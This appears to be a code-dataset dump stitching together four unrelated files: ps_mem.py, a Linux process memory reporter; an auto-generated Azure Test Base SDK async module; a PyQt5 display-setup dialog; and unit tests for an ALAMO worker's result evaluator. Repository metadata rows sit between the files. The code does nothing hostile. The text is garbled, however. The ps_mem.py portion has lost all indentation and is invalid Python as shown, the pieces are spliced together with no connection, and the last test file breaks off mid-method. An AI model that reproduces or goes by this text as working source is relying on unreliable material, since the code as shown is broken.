# http://github.com/pixelb/scripts/commits/master/scripts/ps_mem.py
# Notes:
#
# All interpreted programs where the interpreter is started
# by the shell or with env, will be merged to the interpreter
# (as that's what's given to exec). For e.g. all python programs
# starting with "#!/usr/bin/env python" will be grouped under python.
# You can change this by using the full command line but that will
# have the undesirable affect of splitting up programs started with
# differing parameters (for e.g. mingetty tty[1-6]).
#
# For 2.6 kernels up to and including 2.6.13 and later 2.4 redhat kernels
# (rmap vm without smaps) it can not be accurately determined how many pages
# are shared between processes in general or within a program in our case:
# http://lkml.org/lkml/2005/7/6/250
# A warning is printed if overestimation is possible.
# In addition for 2.6 kernels up to 2.6.9 inclusive, the shared
# value in /proc/$pid/statm is the total file-backed extent of a process.
# We ignore that, introducing more overestimation, again printing a warning.
# Since kernel 2.6.23-rc8-mm1 PSS is available in smaps, which allows
# us to calculate a more accurate value for the total RAM used by programs.
#
# Programs that use CLONE_VM without CLONE_THREAD are discounted by assuming
# they're the only programs that have the same /proc/$PID/smaps file for
# each instance. This will fail if there are multiple real instances of a
# program that then use CLONE_VM without CLONE_THREAD, or if a clone changes
# its memory map while we're checksumming each /proc/$PID/smaps.
#
# I don't take account of memory allocated for a program
# by other programs. For e.g. memory used in the X server for
# a program could be determined, but is not.
#
# FreeBSD is supported if linprocfs is mounted at /compat/linux/proc/
# FreeBSD 8.0 supports up to a level of Linux 2.6.16
import getopt
import time
import errno
import os
import sys
try:
# md5 module is deprecated on python 2.6
# so try the newer hashlib first
import hashlib
md5_new = hashlib.md5
except ImportError:
import md5
md5_new = md5.new
# The following exits cleanly on Ctrl-C or EPIPE
# while treating other exceptions as before.
def std_exceptions(etype, value, tb):
sys.excepthook = sys.__excepthook__
if issubclass(etype, KeyboardInterrupt):
pass
elif issubclass(etype, IOError) and value.errno == errno.EPIPE:
pass
else:
sys.__excepthook__(etype, value, tb)
sys.excepthook = std_exceptions
#
# Define some global variables
#
PAGESIZE = os.sysconf("SC_PAGE_SIZE") / 1024 #KiB
our_pid = os.getpid()
have_pss = 0
class Proc:
def __init__(self):
uname = os.uname()
if uname[0] == "FreeBSD":
self.proc = '/compat/linux/proc'
else:
self.proc = '/proc'
def path(self, *args):
return os.path.join(self.proc, *(str(a) for a in args))
def open(self, *args):
try:
return open(self.path(*args))
except (IOError, OSError):
val = sys.exc_info()[1]
if (val.errno == errno.ENOENT or # kernel thread or process gone
val.errno == errno.EPERM):
raise LookupError
raise
proc = Proc()
#
# Functions
#
def parse_options():
try:
long_options = ['split-args', 'help', 'total']
opts, args = getopt.getopt(sys.argv[1:], "shtp:w:", long_options)
except getopt.GetoptError:
sys.stderr.write(help())
sys.exit(3)
# ps_mem.py options
split_args = False
pids_to_show = None
watch = None
only_total = False
for o, a in opts:
if o in ('-s', '--split-args'):
split_args = True
if o in ('-t', '--total'):
only_total = True
if o in ('-h', '--help'):
sys.stdout.write(help())
sys.exit(0)
if o in ('-p',):
try:
pids_to_show = [int(x) for x in a.split(',')]
except:
sys.stderr.write(help())
sys.exit(3)
if o in ('-w',):
try:
watch = int(a)
except:
sys.stderr.write(help())
sys.exit(3)
return (split_args, pids_to_show, watch, only_total)
def help():
help_msg = 'ps_mem.py - Show process memory usage\n'\
'\n'\
'-h Show this help\n'\
'-w <N> Measure and show process memory every N seconds\n'\
'-p <pid>[,pid2,...pidN] Only show memory usage PIDs in the specified list\n' \
'-s, --split-args Show and separate by, all command line arguments\n' \
'-t, --total Show only the total value\n'
return help_msg
#(major,minor,release)
def kernel_ver():
kv = proc.open('sys/kernel/osrelease').readline().split(".")[:3]
last = len(kv)
if last == 2:
kv.append('0')
last -= 1
while last > 0:
for char in "-_":
kv[last] = kv[last].split(char)[0]
try:
int(kv[last])
except:
kv[last] = 0
last -= 1
return (int(kv[0]), int(kv[1]), int(kv[2]))
#return Private,Shared
#Note shared is always a subset of rss (trs is not always)
def getMemStats(pid):
global have_pss
mem_id = pid #unique
Private_lines = []
Shared_lines = []
Pss_lines = []
Rss = (int(proc.open(pid, 'statm').readline().split()[1])
* PAGESIZE)
if os.path.exists(proc.path(pid, 'smaps')): #stat
digester = md5_new()
for line in proc.open(pid, 'smaps').readlines(): #open
# Note we checksum smaps as maps is usually but
# not always different for separate processes.
digester.update(line.encode('latin1'))
if line.startswith("Shared"):
Shared_lines.append(line)
elif line.startswith("Private"):
Private_lines.append(line)
elif line.startswith("Pss"):
have_pss = 1
Pss_lines.append(line)
mem_id = digester.hexdigest()
Shared = sum([int(line.split()[1]) for line in Shared_lines])
Private = sum([int(line.split()[1]) for line in Private_lines])
#Note Shared + Private = Rss above
#The Rss in smaps includes video card mem etc.
if have_pss:
pss_adjust = 0.5 # add 0.5KiB as this avg error due to trunctation
Pss = sum([float(line.split()[1])+pss_adjust for line in Pss_lines])
Shared = Pss - Private
elif (2,6,1) <= kernel_ver() <= (2,6,9):
Shared = 0 #lots of overestimation, but what can we do?
Private = Rss
else:
Shared = int(proc.open(pid, 'statm').readline().split()[2])
Shared *= PAGESIZE
Private = Rss - Shared
return (Private, Shared, mem_id)
def getCmdName(pid, split_args):
cmdline = proc.open(pid, 'cmdline').read().split("\0")
if cmdline[-1] == '' and len(cmdline) > 1:
cmdline = cmdline[:-1]
path = proc.path(pid, 'exe')
try:
path = os.readlink(path)
# Some symlink targets were seen to contain NULs on RHEL 5 at least
# https://github.com/pixelb/scripts/pull/10, so take string up to NUL
path = path.split('\0')[0]
except OSError:
val = sys.exc_info()[1]
if (val.errno == errno.ENOENT or # either kernel thread or process gone
val.errno == errno.EPERM):
raise LookupError
raise
if split_args:
return " ".join(cmdline)
if path.endswith(" (deleted)"):
path = path[:-10]
if os.path.exists(path):
path += " [updated]"
else:
#The path could be have prelink stuff so try cmdline
#which might have the full path present. This helped for:
#/usr/libexec/notification-area-applet.#prelink#.fX7LCT (deleted)
if os.path.exists(cmdline[0]):
path = cmdline[0] + " [updated]"
else:
path += " [deleted]"
exe = os.path.basename(path)
cmd = proc.open(pid, 'status').readline()[6:-1]
if exe.startswith(cmd):
cmd = exe #show non truncated version
#Note because we show the non truncated name
#one can have separated programs as follows:
#584.0 KiB + 1.0 MiB = 1.6 MiB mozilla-thunder (exe -> bash)
# 56.0 MiB + 22.2 MiB = 78.2 MiB mozilla-thunderbird-bin
return cmd
#The following matches "du -h" output
#see also human.py
def human(num, power="Ki"):
powers = ["Ki", "Mi", "Gi", "Ti"]
while num >= 1000: #4 digits
num /= 1024.0
power = powers[powers.index(power)+1]
return "%.1f %s" % (num, power)
def cmd_with_count(cmd, count):
if count > 1:
return "%s (%u)" % (cmd, count)
else:
return cmd
#Warn of possible inaccuracies
#2 = accurate & can total
#1 = accurate only considering each process in isolation
#0 = some shared mem not reported
#-1= all shared mem not reported
def shared_val_accuracy():
"""http://wiki.apache.org/spamassassin/TopSharedMemoryBug"""
kv = kernel_ver()
if kv[:2] == (2,4):
if proc.open('meminfo').read().find("Inact_") == -1:
return 1
return 0
elif kv[:2] == (2,6):
pid = os.getpid()
if os.path.exists(proc.path(pid, 'smaps')):
if proc.open(pid, 'smaps').read().find("Pss:")!=-1:
return 2
else:
return 1
if (2,6,1) <= kv <= (2,6,9):
return -1
return 0
elif kv[0] > 2:
return 2
else:
return 1
def show_shared_val_accuracy( possible_inacc, only_total=False ):
level = ("Warning","Error")[only_total]
if possible_inacc == -1:
sys.stderr.write(
"%s: Shared memory is not reported by this system.\n" % level
)
sys.stderr.write(
"Values reported will be too large, and totals are not reported\n"
)
elif possible_inacc == 0:
sys.stderr.write(
"%s: Shared memory is not reported accurately by this system.\n" % level
)
sys.stderr.write(
"Values reported could be too large, and totals are not reported\n"
)
elif possible_inacc == 1:
sys.stderr.write(
"%s: Shared memory is slightly over-estimated by this system\n"
"for each program, so totals are not reported.\n" % level
)
sys.stderr.close()
if only_total and possible_inacc != 2:
sys.exit(1)
def get_memory_usage( pids_to_show, split_args, include_self=False, only_self=False ):
cmds = {}
shareds = {}
mem_ids = {}
count = {}
for pid in os.listdir(proc.path('')):
if not pid.isdigit():
continue
pid = int(pid)
# Some filters
if only_self and pid != our_pid:
continue
if pid == our_pid and not include_self:
continue
if pids_to_show is not None and pid not in pids_to_show:
continue
try:
cmd = getCmdName(pid, split_args)
except LookupError:
#operation not permitted
#kernel threads don't have exe links or
#process gone
continue
try:
private, shared, mem_id = getMemStats(pid)
except RuntimeError:
continue #process gone
if shareds.get(cmd):
if have_pss: #add shared portion of PSS together
shareds[cmd] += shared
elif shareds[cmd] < shared: #just take largest shared val
shareds[cmd] = shared
else:
shareds[cmd] = shared
cmds[cmd] = cmds.setdefault(cmd, 0) + private
if cmd in count:
count[cmd] += 1
else:
count[cmd] = 1
mem_ids.setdefault(cmd, {}).update({mem_id:None})
#Add shared mem for each program
total = 0
for cmd in cmds:
cmd_count = count[cmd]
if len(mem_ids[cmd]) == 1 and cmd_count > 1:
# Assume this program is using CLONE_VM without CLONE_THREAD
# so only account for one of the processes
cmds[cmd] /= cmd_count
if have_pss:
shareds[cmd] /= cmd_count
cmds[cmd] = cmds[cmd] + shareds[cmd]
total += cmds[cmd] #valid if PSS available
sorted_cmds = sorted(cmds.items(), key=lambda x:x[1])
sorted_cmds = [x for x in sorted_cmds if x[1]]
return sorted_cmds, shareds, count, total
def print_header():
sys.stdout.write(" Private + Shared = RAM used\tProgram\n\n")
def print_memory_usage(sorted_cmds, shareds, count, total):
for cmd in sorted_cmds:
sys.stdout.write("%8sB + %8sB = %8sB\t%s\n" %
(human(cmd[1]-shareds[cmd[0]]),
human(shareds[cmd[0]]), human(cmd[1]),
cmd_with_count(cmd[0], count[cmd[0]])))
if have_pss:
sys.stdout.write("%s\n%s%8sB\n%s\n" %
("-" * 33, " " * 24, human(total), "=" * 33))
def verify_environment():
if os.geteuid() != 0:
sys.stderr.write("Sorry, root permission required.\n")
if __name__ == '__main__':
sys.stderr.close()
sys.exit(1)
try:
kv = kernel_ver()
except (IOError, OSError):
val = sys.exc_info()[1]
if val.errno == errno.ENOENT:
sys.stderr.write(
"Couldn't access " + proc.path('') + "\n"
"Only GNU/Linux and FreeBSD (with linprocfs) are supported\n")
sys.exit(2)
else:
raise
if __name__ == '__main__':
verify_environment()
split_args, pids_to_show, watch, only_total = parse_options()
if not only_total:
print_header()
if watch is not None:
try:
sorted_cmds = True
while sorted_cmds:
sorted_cmds, shareds, count, total = get_memory_usage( pids_to_show, split_args )
if only_total and have_pss:
sys.stdout.write(human(total).replace(' ','')+'B\n')
elif not only_total:
print_memory_usage(sorted_cmds, shareds, count, total)
time.sleep(watch)
else:
sys.stdout.write('Process does not exist anymore.\n')
except KeyboardInterrupt:
pass
else:
# This is the default behavior
sorted_cmds, shareds, count, total = get_memory_usage( pids_to_show, split_args )
if only_total and have_pss:
sys.stdout.write(human(total).replace(' ','')+'B\n')
elif not only_total:
print_memory_usage(sorted_cmds, shareds, count, total)
# We must close explicitly, so that any EPIPE exception
# is handled by our excepthook, rather than the default
# one which is reenabled after this script finishes.
sys.stdout.close()
vm_accuracy = shared_val_accuracy()
show_shared_val_accuracy( vm_accuracy, only_total )
| gpl-3.0 | -8,928,246,836,031,157,000 | 34.855102 | 97 | 0.575047 | false |
Azure/azure-sdk-for-python | sdk/testbase/azure-mgmt-testbase/azure/mgmt/testbase/aio/operations/_test_summaries_operations.py | 1 | 9021 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class TestSummariesOperations:
"""TestSummariesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~test_base.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name: str,
test_base_account_name: str,
**kwargs: Any
) -> AsyncIterable["_models.TestSummaryListResult"]:
"""Lists the Test Summaries of all the packages under a Test Base Account.
:param resource_group_name: The name of the resource group that contains the resource.
:type resource_group_name: str
:param test_base_account_name: The resource name of the Test Base Account.
:type test_base_account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either TestSummaryListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~test_base.models.TestSummaryListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TestSummaryListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-12-16-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'testBaseAccountName': self._serialize.url("test_base_account_name", test_base_account_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('TestSummaryListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.TestBase/testBaseAccounts/{testBaseAccountName}/testSummaries'} # type: ignore
async def get(
self,
resource_group_name: str,
test_base_account_name: str,
test_summary_name: str,
**kwargs: Any
) -> "_models.TestSummaryResource":
"""Gets a Test Summary with specific name from all the Test Summaries of all the packages under a
Test Base Account.
:param resource_group_name: The name of the resource group that contains the resource.
:type resource_group_name: str
:param test_base_account_name: The resource name of the Test Base Account.
:type test_base_account_name: str
:param test_summary_name: The name of the Test Summary.
:type test_summary_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: TestSummaryResource, or the result of cls(response)
:rtype: ~test_base.models.TestSummaryResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TestSummaryResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-12-16-preview"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'testBaseAccountName': self._serialize.url("test_base_account_name", test_base_account_name, 'str'),
'testSummaryName': self._serialize.url("test_summary_name", test_summary_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('TestSummaryResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.TestBase/testBaseAccounts/{testBaseAccountName}/testSummaries/{testSummaryName}'} # type: ignore
| mit | -5,264,327,462,107,151,000 | 48.839779 | 212 | 0.652478 | false |
RalfJung/lilass | qt_frontend.py | 1 | 7267 | # DSL - easy Display Setup for Laptops
# Copyright (C) 2012-2015 Ralf Jung <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import sys, os
from screen import RelativeScreenPosition, ScreenSetup
try:
# Be fine with PyQt4 not being installed
from PyQt5 import QtCore, QtWidgets, uic
class PositionSelection(QtWidgets.QDialog):
def __init__(self, situation):
# set up main window
super(PositionSelection, self).__init__()
self._situation = situation
uifile = os.path.join(os.path.dirname(__file__), 'qt_dialogue.ui')
uic.loadUi(uifile, self)
# fill relative position box
for pos in RelativeScreenPosition:
self.relPos.addItem(pos.text, pos)
# keep resolutions in sync when in mirror mode
def syncIfMirror(source, target):
def _slot(idx):
if self.isMirror:
target.setCurrentIndex(idx)
source.currentIndexChanged.connect(_slot)
syncIfMirror(self.intRes, self.extRes)
syncIfMirror(self.extRes, self.intRes)
# if situation has a previousSetup, use its values as initial state
if situation.previousSetup:
p = situation.previousSetup
self.intEnabled.setChecked(p.intResolution is not None)
self.extEnabled.setChecked(p.extResolution is not None)
if p.relPosition:
self.relPos.setCurrentIndex(p.relPosition.value - 1)
if p.extIsPrimary:
self.extPrimary.setChecked(True)
else:
self.intPrimary.setChecked(True)
# Pre-select the previous resolution
self._intDefaultRes = p.intResolution
self._extDefaultRes = p.extResolution
self._mirrorDefaultRes = p.intResolution if p.relPosition == RelativeScreenPosition.MIRROR else None # in case of a mirror, they would be the same anyway
else:
self._intDefaultRes = situation.internalConnector.getPreferredResolution()
self._extDefaultRes = situation.externalConnector.getPreferredResolution()
self._mirrorDefaultRes = None
# connect the update function
self.intEnabled.toggled.connect(self.updateEnabledControls)
self.extEnabled.toggled.connect(self.updateEnabledControls)
self.relPos.currentIndexChanged.connect(self.updateEnabledControls)
# make sure we are in a correct state
self.updateEnabledControls()
def getRelativeScreenPosition(self):
idx = self.relPos.currentIndex()
return self.relPos.itemData(idx)
def fillResolutionBox(self, box, resolutions, select = None):
# if the count did not change, update in-place (this avoids flicker)
if box.count() == len(resolutions):
for idx, res in enumerate(resolutions):
box.setItemText(idx, str(res))
box.setItemData(idx, res)
if res == select:
box.setCurrentIndex(idx)
else:
# first clear it
while box.count() > 0:
box.removeItem(0)
# then fill it
for res in resolutions:
box.addItem(str(res), res)
if res == select:
box.setCurrentIndex(box.count() - 1) # select the most recently added one
def updateEnabledControls(self):
intEnabled = self.intEnabled.isChecked()
extEnabled = self.extEnabled.isChecked()
bothEnabled = intEnabled and extEnabled
self.isMirror = bothEnabled and self.getRelativeScreenPosition() == RelativeScreenPosition.MIRROR # only if both are enabled, we can really mirror
# configure screen controls
self.intRes.setEnabled(intEnabled)
self.intPrimary.setEnabled(intEnabled and not self.isMirror)
self.extRes.setEnabled(extEnabled)
self.extPrimary.setEnabled(extEnabled and not self.isMirror)
if not intEnabled and extEnabled:
self.extPrimary.setChecked(True)
elif not extEnabled and intEnabled:
self.intPrimary.setChecked(True)
# which resolutions do we offer?
if self.isMirror:
commonRes = self._situation.commonResolutions()
self.fillResolutionBox(self.intRes, commonRes, select = self._mirrorDefaultRes)
self.fillResolutionBox(self.extRes, commonRes, select = self._mirrorDefaultRes)
self.intRes.setCurrentIndex(self.extRes.currentIndex())
else:
self.fillResolutionBox(self.intRes, self._situation.internalConnector.getResolutionList(), select = self._intDefaultRes)
self.fillResolutionBox(self.extRes, self._situation.externalConnector.getResolutionList(), select = self._extDefaultRes)
# configure position control
self.posGroup.setEnabled(bothEnabled)
self.posLabel1.setEnabled(bothEnabled)
self.posLabel2.setEnabled(bothEnabled)
self.relPos.setEnabled(bothEnabled)
# avoid having no screen
self.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(intEnabled or extEnabled)
def run(self):
self.exec_()
if not self.result(): return None
intRes = self.intRes.itemData(self.intRes.currentIndex()) if self.intEnabled.isChecked() else None
extRes = self.extRes.itemData(self.extRes.currentIndex()) if self.extEnabled.isChecked() else None
return ScreenSetup(intRes, extRes, self.getRelativeScreenPosition(), self.extPrimary.isChecked())
except ImportError:
pass
# Qt frontend
class QtFrontend:
def __init__(self):
from PyQt5 import QtWidgets
self.app = QtWidgets.QApplication(sys.argv)
print("Qt loaded")
def error(self, message):
from PyQt5 import QtWidgets
QtWidgets.QMessageBox.critical(None, 'Fatal error', message)
def setup(self, situation):
return PositionSelection(situation).run()
@staticmethod
def isAvailable():
try:
import PyQt5
return True
except ImportError:
return False
| gpl-2.0 | -1,890,211,412,476,436,700 | 45.583333 | 169 | 0.624329 | false |
RulersOfAsgard/ALAMO-worker | alamo_worker/plugins/tests/test_evaluate.py | 1 | 14081 | # -*- coding: utf-8 -*-
from collections import OrderedDict
from unittest.case import TestCase
from unittest import mock
from alamo_common.test.utils import override_settings
from alamo_worker.plugins.druid import DruidResult
from alamo_worker.plugins.evaluate import ResultEvaluator
from alamo_worker.plugins.http_check import HttpResult
from alamo_worker.plugins.graphite import GraphiteResult
from alamo_worker.plugins.prometheus import PrometheusResult
from alamo_worker.plugins.mixins import (
RESULT_OK,
RESULT_FAILED,
RESULT_UNKNOWN,
)
class TestResultEvaluator(TestCase):
@staticmethod
def get_payload(rule):
return {
'id': 2206299,
'triggers': [
{
'rule': rule,
'url': 'http://some.url',
}],
}
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluation_for_unknown_status(self, stats):
rule = 'check_name.values < 200'
plugin_results = [
# unknown status
GraphiteResult('check_name', {}, env='test')
]
evaluator = ResultEvaluator()
payload = self.get_payload(rule)
payload['unknown_as_failure'] = True
result = evaluator.evaluate(payload, plugin_results)
expected = {
'status': RESULT_FAILED,
'message': ('Metric not found in `check_name` source, '
'check your query'),
'hysteresis': RESULT_OK
}
self.assertEqual(result['triggers'][0]['result'], expected)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_passing_rule(self, stats):
rule = 'check_name.status_code != 200'
plugin_results = [
HttpResult('check_name', 200)
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected = {
'status': RESULT_OK,
'message': '',
'hysteresis': RESULT_OK,
'http_response_body': '',
}
self.assertEqual(result['triggers'][0]['result'], expected)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_failing_rule(self, stats):
rule = 'check_name.status_code != 200'
plugin_results = [
HttpResult('check_name', 404)
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
msg = 'Check failed for rule `{}` which evaluates to `True`'.format(
rule)
expected = {
'status': RESULT_FAILED,
'message': msg,
'hysteresis': RESULT_OK,
'http_response_body': '',
}
self.assertEqual(result['triggers'][0]['result'], expected)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_multiple_successful_results(self, stats):
rule = 'check1.status_code != 200 AND check2.status_code != 200'
plugin_results = [
HttpResult('check1', 200, status=RESULT_UNKNOWN),
HttpResult('check2', 200, status=RESULT_OK),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected = {
'status': RESULT_UNKNOWN,
'message': '',
'hysteresis': RESULT_OK,
'http_response_body': '',
}
self.assertEqual(result['triggers'][0]['result'], expected)
@override_settings(FAIL_ON_UNKNOWN=False)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_multiple_failed_results(self, stats):
rule = 'check1.status_code != 200 AND check2.status_code != 200'
plugin_results = [
HttpResult('check1', 404, status=RESULT_UNKNOWN),
HttpResult('check2', 404, status=RESULT_OK),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
msg = 'Check failed for rule `check1.status_code != 200` '\
'which evaluates to `True`, Check failed for rule '\
'`check2.status_code != 200` which evaluates to `True`'
expected = {
'status': RESULT_FAILED,
'message': msg,
'hysteresis': RESULT_OK,
'http_response_body': '',
}
self.assertEqual(result['triggers'][0]['result'], expected)
@override_settings(FAIL_ON_UNKNOWN=True)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_multiple_failed_results_with_strict_fail(self, stats):
rule = 'check1.status_code != 200 AND check2.status_code != 200'
plugin_results = [
HttpResult('check1', 404, status=RESULT_UNKNOWN),
HttpResult('check2', 404, status=RESULT_OK),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected = {
'status': RESULT_UNKNOWN,
'hysteresis': 0,
'message': '',
'http_response_body': '',
}
self.assertEqual(result['triggers'][0]['result'], expected)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_multiple_different_results(self, stats):
rule = 'check1.status_code != 200 AND check2.status_code != 200'
plugin_results = [
HttpResult('check1', 404, status=RESULT_OK),
HttpResult('check2', 200, status=RESULT_OK),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected = {
'status': RESULT_OK,
'message': '',
'hysteresis': RESULT_OK,
'http_response_body': '',
}
self.assertEqual(result['triggers'][0]['result'], expected)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
@mock.patch.object(GraphiteResult, 'build_meta')
def test_evaluate_multiple_sources_with_diff_statuses_and_one_is_unknown(
self, *args
):
plugin_results = [
GraphiteResult('check_first', {'a': [5]}, ),
# this result is unknown
GraphiteResult('check_second', {}),
]
payload = {
'id': 999,
'triggers': [
{'rule': 'check_first.values < 1'},
{'rule': 'check_second.values < 200'},
]
}
result = ResultEvaluator().evaluate(payload, plugin_results)
expected = {
'status': RESULT_OK,
'message': '',
'hysteresis': RESULT_OK,
}
self.assertEqual(result['triggers'][0]['result'], expected)
self.assertEqual(result['triggers'][1]['result'], {
'status': RESULT_UNKNOWN,
'message': ('Metric not found in `check_second` source, '
'check your query'),
'hysteresis': RESULT_OK,
})
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
@mock.patch.object(GraphiteResult, 'build_meta')
def test_evaluation_build_proper_target_for_trigger(self, *args):
plugin_results = [
GraphiteResult('foo', {'foo': [1, 2, 3]}, metric='stats.test.foo'),
GraphiteResult('bar', {'bar': [1, 2, 3]}, metric='stats.test.bar'),
GraphiteResult('baz', {'baz': [1, 2, 3]}, metric='stats.test.baz'),
]
trigger = {'rule': 'foo.values > 10 OR bar.values > 10'}
payload = {
'id': 999,
'triggers': [trigger]
}
ResultEvaluator().evaluate(payload, plugin_results)
expected = {
'status': RESULT_OK,
'message': '',
'hysteresis': RESULT_OK
}
self.assertEqual(trigger['result'], expected)
self.assertEqual(trigger['target'], 'stats.test.bar,stats.test.foo')
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_invalid_rule(self, stats):
rule = 'cat dog'
plugin_results = [
HttpResult('check', 200),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected = {
'status': RESULT_UNKNOWN,
'message': '',
'hysteresis': RESULT_OK,
'http_response_body': '',
}
self.assertEqual(result['triggers'][0]['result'], expected)
stats.increment.incr.assert_called_once_with(
'manager.warnings.invalid_rule')
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_failed_plugin_result(self, stats):
rule = 'check.status_code != 200'
content = 'some content'
plugin_results = [
HttpResult('check', 200, status=RESULT_FAILED,
message='some message', content=content),
]
evaluator = ResultEvaluator()
result = evaluator.evaluate(self.get_payload(rule), plugin_results)
expected = {
'status': RESULT_FAILED,
'message': 'some message',
'hysteresis': RESULT_OK,
'http_response_body': content
}
expected_meta = {
'links': {
'trigger_url': {'href': 'http://some.url', 'type': 'link'}
},
}
self.assertEqual(result['triggers'][0]['result'], expected)
self.assertEqual(result['triggers'][0]['meta'], expected_meta)
@mock.patch('alamo_worker.plugins.evaluate.aiostats')
def test_evaluate_unknown_plugin_result(self, stats):
rule = 'druid.histogram_90 > 70000'
plugin_results = [
DruidResult('druid', [], status=RESULT_UNKNOWN,
message='Unknown Message'),
]
evaluator = ResultEvaluator()
